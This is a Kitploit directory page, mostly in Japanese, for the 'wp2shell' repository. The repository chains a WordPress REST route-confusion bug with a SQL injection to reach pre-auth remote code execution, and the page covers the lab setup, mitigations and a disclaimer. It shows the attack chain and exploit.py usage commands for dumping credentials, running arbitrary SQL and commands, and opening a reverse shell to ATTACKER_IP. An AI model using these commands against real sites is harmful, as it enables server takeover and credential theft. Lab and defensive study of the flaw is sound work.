Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
27日前未レビュー

CVE-2026-63030 & CVE-2026-60137 — wp2shell

WordPress Core Pre-Auth RCE — Route Confusion + SQL Injection を連鎖させて Remote Code Execution を実現

CVECVE-2026-63030 + CVE-2026-60137
別名wp2shell
脆弱性種別REST API Route Confusion → SQL Injection → RCE
深刻度緊急(Critical) — CVSS 10.0
影響を受けるバージョンWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
修正バージョンWordPress 6.8.6, 6.9.5, 7.0.2
認証要件不要(Pre-Auth)

概要

wp2shell は、WordPress Core の 2 つの脆弱性を組み合わせたエクスプロイトチェーンの名称です:

  • CVE-2026-63030 — Route Confusion: Batch endpoint(/wp-json/batch/v1)は、サブリクエストに誤った path が含まれると $matches[] と $validation[] の配列 index がずれ、次のサブリクエストが誤ったハンドラで実行される → REST API のスキーマ検証をバイパスします。
  • CVE-2026-60137 — SQL Injection: WP_Query::get_posts() は、author__not_in パラメータが配列ではなく文字列で渡された場合にサニタイズされない → 生の SQL インジェクションが発生します。

2 つのバグを組み合わせることで、完全な Pre-Auth RCE チェーンが成立します。認証情報ゼロから、HTTP リクエストだけでサーバー上のシェルを取得できます。

エクスプロイトチェーン

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

完全な技術分析は REPORT.md を参照してください。


ラボ環境のセットアップ

ラボは 3 つのコンテナで構成される Docker Compose を使用します:

コンテナ

要件

  • Docker + Docker Compose
  • Python 3.8+(stdlib のみ、追加パッケージのインストール不要)
  • Bash(setup.sh を実行するため)

起動

root@kitploit:~
cd wp2shell-lab
bash setup.sh

スクリプトは自動的に以下を実行します:

  1. イメージを pull してコンテナを起動する
  2. WordPress 6.9.4 をインストールする
  3. サンプルデータ(投稿、ユーザー)を投入する
  4. MySQL の general log と WP_DEBUG を有効化する

完了すると、ログイン情報とともに "WP2Shell Lab — READY!" が表示されます。

クリーンアップ

root@kitploit:~
cd wp2shell-lab
docker compose down -v

エクスプロイトの使用方法

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

PoC スクリプトは Icex0/wp2shell-poc を参考にゼロから書き直したものです。 Python 3 の stdlib のみを使用し、追加の依存関係は必要ありません。


エクスプロイトの条件

条件要件
WordPress バージョン6.9.0–6.9.4 または 7.0.0–7.0.1
REST API バッチエンドポイントアクセス可能(デフォルトで有効)
認証不要
ネットワーク攻撃者から WordPress に到達可能

緩和策

  1. WordPress を >= 6.9.5 または >= 7.0.2 にアップグレードする — 唯一の抜本的な対策です。
  2. バッチエンドポイントを一時的に無効化する: functions.php に add_filter('rest_batch_disabled', '__return_true'); を追加します。
  3. WAF ルール: SQL キーワードを含む /wp-json/batch/v1 へのリクエストをブロックします。

免責事項

このリポジトリは、管理されたラボ環境における 研究、学習、CTF を目的として作成されました。 実システムへの攻撃には使用しないでください。不正なエクスプロイト行為はすべて法律違反です。


参考情報

  • Icex0/wp2shell-poc — 参考にしたオリジナル PoC
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
ツールをダウンロード
イメージ
ポート
WordPress (vulnerable)wordpress:6.9.48080
MySQLmysql:8.0内部
phpMyAdminphpmyadmin:latest8081